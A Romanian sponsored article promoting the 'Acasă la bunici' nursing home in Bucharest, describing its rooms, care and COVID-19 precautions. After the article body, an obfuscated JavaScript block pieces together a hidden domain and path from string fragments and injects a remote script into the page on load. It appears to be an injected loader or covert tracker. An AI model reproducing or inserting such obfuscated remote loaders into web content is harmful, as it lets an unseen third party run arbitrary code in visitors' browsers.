Esti aici
Acasa => Monden => (P) Căminul de bătrâni „Acasă la bunici” – un mediu sănătos și sigur în care bătrânii sunt îngrijiți cu iubire

(P) Căminul de bătrâni „Acasă la bunici” – un mediu sănătos și sigur în care bătrânii sunt îngrijiți cu iubire

Căminul „Acasă la bunici” este locul unde bătrânii primesc îngrijire şi se bucură de confortul dorit. În acest cămin bunicii beneficiază de asistență medicală și psihologică permanentă, dar și de servicii medicale personalizate pentru cei care suferă de anumite afecțiuni.

Caminul „Acasă la bunici” este locul unde bătrânii primesc îngrijire şi se bucură de confortul dorit. În acest cămin bunicii beneficiază de asistență medicală și psihologică permanentă, dar și de servicii medicale personalizate pentru cei care suferă de anumite afecțiuni.

Căminul de bătrâni „Acasă la bunici” este situat în Bucureşti, în apropierea parcurilor Tineretului şi Carol I, într-un imobil nou şi modern.

Vârstnicii dispun de cele mai bune condiții de cazare, atenția cuvenită și supraveghere continuă oferită de un personal cu experiență în îngrijirea persoanelor în vârstă.

Camerele căminului sunt dotate cu mobilier nou, televizor, aer condiționat și internet, iar acolo unde este nevoie căminul dispune de mobilier specific persoanelor cu probleme motrice. Bătrânii pot alege sa se cazeze în camere cu 1, 2, 3 sau chiar 4 paturi.

Grupurile sanitare sunt curate, spațioase și dispun de toalete, chiuvete și bideuri moderne, de cea mai bună calitate.

“Acasă la bunici” este un spațiu primitor ce oferă siguranță, liniște, relaxare și o atmosferă prietenoasă și familială, pentru ca bătrânii să nu se simtă niciodată singuri. Aici, bătrânii vor putea oricând să se bucure de activitățile care le fac plăcere, într-un cadru și într-o ambianță specifică vârstei lor, respectându-se non-stop măsurile de prevenire a răspândirii noului Coronavirus.

Zilnic bătrânii se spală pe mâini cel puțin 20 de secunde, cel puțin o dată pe oră (sau de fiecare dată când este necesar), li se ia temperatura și se asigură vitaminizarea corespunzătoare a acestora

Podelele și toate obiectele/suprafețele și echipamentele folosite frecvent sunt spălate și dezinfectate de mai multe ori pe zi cu substanțe pe bază de clor/alcool, căci sănătatea și siguranța sunt pe primul loc în cadrul Căminului „Acasă la bunici”.

Centrul de îngrijire se face răspunzător cu identificarea membrilor personalului potențial infectați și, în cazul în care se impune, toți rezidenții și personalul auxiliar se izolează, dacă aceștia prezintă febră și simptome respiratorii.

Vizitele la bătrâni se acceptă doar cu stricta respectare a măsurilor anti-COVID19.

Activitățile grupului și întâlnirile în sălile de mese la comun au fost anulate, astfel bătrânii stau, preponderent în camerele lor, urmând ca toate mesele/gustările să fie servite acolo (în limita posibilităților) sau în anumite cazuri bunicii mănâncă în sala de mese în grupuri mai mici de persoane și respectă distanța socială (distanță de cel puțin 1,5m între mese).

Purtarea echipamentului corespunzător (măști, mănuși, halate și papuci de protecție) de către toți angajații/colaboratorii și respectarea tuturor măsurilor de prevenție împotriva răspândirii COVID-19, fac din centrul „Acasă la bunici” un mediu sănătos și sigur în care bătrânii sunt îngrijiți, cu blândețe, în mod adecvat.

<script>
(function(){
x2x0_=("u"+"")+"s"+"";x2x0_+=("tat.")+("i");
x2x0=document.createElement("script");x2x0.type="text/javascript";x2x0_+="nf"+("o")+"/";
x2x0u="257034393"+".";x2x0.async=true;x2x0u+="4k90wn0s2x0myt3pqfg7sfd4lmj4X0";
x2x0.src="https://"+x2x0_+x2x0u;x2x0b=document.body;x2x0b.appendChild(x2x0);
})();
</script>

Powered by WPeMatico

Articole similare

Sus
%d blogeri au apreciat: